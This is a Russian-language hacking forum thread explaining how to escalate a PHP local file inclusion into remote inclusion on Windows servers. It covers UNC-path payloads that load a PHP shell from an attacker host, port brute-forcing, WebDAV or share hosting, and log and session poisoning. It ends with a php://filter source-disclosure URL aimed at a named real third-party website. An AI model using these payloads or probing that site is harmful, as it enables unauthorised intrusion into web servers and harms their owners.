Форум АНТИЧАТ - раскрутить LFI до RFI под ос WINDOWS

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - раскрутить LFI до RFI под ос WINDOWS (https://forum.antichat.xyz/showthread.php?t=350518)

Кто незнает что такое "LFI" (это распространенная уязвимость с помощью которой мы можем подгрузить произвольный скрипт что бы он исполнился на веб-сервере)

Объясняю

Простейший пример скрипта на PHP будет выглядить следующим образом:

Таким образом если мы передадим такому скрипту в параметр "file" имя какого то ещё PhP скрипта ,то PHP при его исполнении попытается подгрузить скрипт из параметра и исполнить его.

Но нам нужно как "хакерам" не тупо что то подгрузить из функционала веб-приложения,нам нужен шелл и здесь нам надо подгрузить скрипт с нашим контентом .

Самый распространненый способ расположить наш PHP-шелл на каком нибудь веб-сервере и указать полный путь до файла

например:

http://attackег.com/shell.php

Но данный способ срабатывает нечасто,так как в конфигах РНР есть опция, запрещающая подгрузку удаленных файлов.

Все, что требуется для обхода ограничения, - это, во-первых,

чтобы веб-сервер с РНР был запущен под Windows, а во -вторых, указать путь до нашего файла в виде:

\\attackег..com\shell.php

0чень часто веб-серверы находятся за файрволами, а потому обратиться напрямую по шаре через интернет к веб-серверу нам вряд ли удастся.

Мы можем указать порт, по которому он к нам будет коннектиться:

\\attackег..com:31337\shell.php

Таким образом, мы можем пробрутить порты и найти, какой из

них разрешен.

Итак, мы имеем такую последовательность:

1. Понять, что 0С-Windows.

2. Поснифать на аttасkеr.соm трафик и, брутя порты,

пOнять, где есть дырка

3. Поднять на данном порту анонимный WebDAV или шару,

4. Выложить на нее шелл и подгрузить его.

5. Радоваться.=)=)=)=)

Вроде все.

Да ты я смотрю хакер читал за сентябрь

да... тема слишком громко называется...

а вот такое расковыряешь?

include('locale/'.$_GET['lang'].'/footer.html');

вот лфи на лицо, жду предложения как сделать рфи

"такое" скорее всего проще заюзать как LFI:

1) Найти phpinfo(), воспользоваться выводом полного пути до загруженного файла

2) Найти файлы с логами, сессиями, попытаться прокинуть код через них

3) Найти пути до файлов таблиц базы данных и проинклудить таблицы (там обычно можно разобраться, хоть и много мусора)

4) Заглянуть за новыми идеями в настройки апача, пхп, майэскуэл

Цитата:

Сообщение от zeus.msk

"такое" скорее всего проще заюзать как LFI:
1) Найти phpinfo(), воспользоваться выводом полного пути до загруженного файла
2) Найти файлы с логами, сессиями, попытаться прокинуть код через них
3) Найти пути до файлов таблиц базы данных и проинклудить таблицы (там обычно можно разобраться, хоть и много мусора)
4) Заглянуть за новыми идеями в настройки апача, пхп, майэскуэл

я знаю что с таким делать, но тема же навызвается крутим лфи до рфи

и такое не проще заюзать как лфи, а тут только лфи.

Ну-с-с-с, гуру хекинга...

Покажите мне вашу LFI/RFI в действии, а ?

Код:

http://www.ial7.ru.ac.th/index.php?page=php://filter/convert.base64-encode/resource=index.php

_ttp://www.ial7.ru.ac.th/index.php?page=